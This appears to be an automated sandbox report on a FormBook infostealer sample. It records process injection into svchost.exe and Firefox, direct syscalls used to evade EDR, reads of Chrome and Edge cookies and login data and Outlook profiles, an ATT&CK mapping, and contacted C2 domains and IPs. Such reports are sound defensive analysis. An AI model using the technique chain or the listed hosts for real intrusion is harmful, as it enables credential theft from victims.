            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB0946 mov eax, dword ptr fs:[00000030h]1_2_03BB0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C008C0 mov eax, dword ptr fs:[00000030h]1_2_03C008C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBC89D mov eax, dword ptr fs:[00000030h]1_2_03BBC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B30887 mov eax, dword ptr fs:[00000030h]1_2_03B30887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]1_2_03B6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]1_2_03B6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFA8E4 mov eax, dword ptr fs:[00000030h]1_2_03BFA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E8C0 mov eax, dword ptr fs:[00000030h]1_2_03B5E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]1_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]1_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]1_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B52835 mov ecx, dword ptr fs:[00000030h]1_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]1_2_03B52835
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009E0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_009E0B62
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009B2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009B2622
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009A083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009A083F
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009A09D5 SetUnhandledExceptionFilter,0_2_009A09D5
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009A0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_009A0C21

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\chkntfs.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: NULL target: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: NULL target: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\chkntfs.exeThread register set: target process: 4544Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\chkntfs.exeThread APC queued: target process: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 30C8008Jump to behavior
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009E1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_009E1201
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009C2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_009C2BA5
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009EB226 SendInput,keybd_event,0_2_009EB226
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_00A022DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_00A022DA
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\p4LNUqyKZM.exe"Jump to behavior
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exeProcess created: C:\Windows\SysWOW64\chkntfs.exe "C:\Windows\SysWOW64\chkntfs.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009E0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_009E0B62
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009E1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_009E1663
            Source: p4LNUqyKZM.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: p4LNUqyKZM.exe, SCsLZYqthBle.exe, 00000002.00000002.3535728299.0000000000C91000.00000002.00000001.00040000.00000000.sdmp, SCsLZYqthBle.exe, 00000002.00000000.1809890288.0000000000C91000.00000002.00000001.00040000.00000000.sdmp, SCsLZYqthBle.exe, 00000007.00000002.3536020379.0000000001701000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: SCsLZYqthBle.exe, 00000002.00000002.3535728299.0000000000C91000.00000002.00000001.00040000.00000000.sdmp, SCsLZYqthBle.exe, 00000002.00000000.1809890288.0000000000C91000.00000002.00000001.00040000.00000000.sdmp, SCsLZYqthBle.exe, 00000007.00000002.3536020379.0000000001701000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: SCsLZYqthBle.exe, 00000002.00000002.3535728299.0000000000C91000.00000002.00000001.00040000.00000000.sdmp, SCsLZYqthBle.exe, 00000002.00000000.1809890288.0000000000C91000.00000002.00000001.00040000.00000000.sdmp, SCsLZYqthBle.exe, 00000007.00000002.3536020379.0000000001701000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: SCsLZYqthBle.exe, 00000002.00000002.3535728299.0000000000C91000.00000002.00000001.00040000.00000000.sdmp, SCsLZYqthBle.exe, 00000002.00000000.1809890288.0000000000C91000.00000002.00000001.00040000.00000000.sdmp, SCsLZYqthBle.exe, 00000007.00000002.3536020379.0000000001701000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009A0698 cpuid 0_2_009A0698
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009F8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_009F8195
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009DD27A GetUserNameW,0_2_009DD27A
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009BBB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_009BBB6F
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_009842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_009842DE

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.3535173412.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3536085232.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1885323394.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3537571964.0000000005410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1884974857.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3536123647.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.3536023408.0000000002D60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1889613718.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\chkntfs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\chkntfs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: p4LNUqyKZM.exeBinary or memory string: WIN_81
            Source: p4LNUqyKZM.exeBinary or memory string: WIN_XP
            Source: p4LNUqyKZM.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: p4LNUqyKZM.exeBinary or memory string: WIN_XPe
            Source: p4LNUqyKZM.exeBinary or memory string: WIN_VISTA
            Source: p4LNUqyKZM.exeBinary or memory string: WIN_7
            Source: p4LNUqyKZM.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.3535173412.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3536085232.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1885323394.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3537571964.0000000005410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1884974857.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3536123647.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.3536023408.0000000002D60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1889613718.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_00A01204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00A01204
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exeCode function: 0_2_00A01806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00A01806

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		1
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets241
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials12
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1503359 Sample: p4LNUqyKZM.exe Startdate: 03/09/2024 Architecture: WINDOWS Score: 100 28 www.asian-massage-us.xyz 2->28 30 www.thriveline.online 2->30 32 13 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 4 other signatures 2->50 10 p4LNUqyKZM.exe 4 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Found API chain indicative of sandbox detection 10->64 66 Writes to foreign memory regions 10->66 68 2 other signatures 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 SCsLZYqthBle.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 chkntfs.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 SCsLZYqthBle.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.dfbio.net 218.247.68.184, 49770, 49771, 80 WEST263GO-HKWest263InternationalLimitedHK China 22->34 36 www.fineg.online 162.0.239.141, 49750, 49751, 49752 NAMECHEAP-NETUS Canada 22->36 38 6 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            p4LNUqyKZM.exe42%ReversingLabsWin32.Trojan.Strab
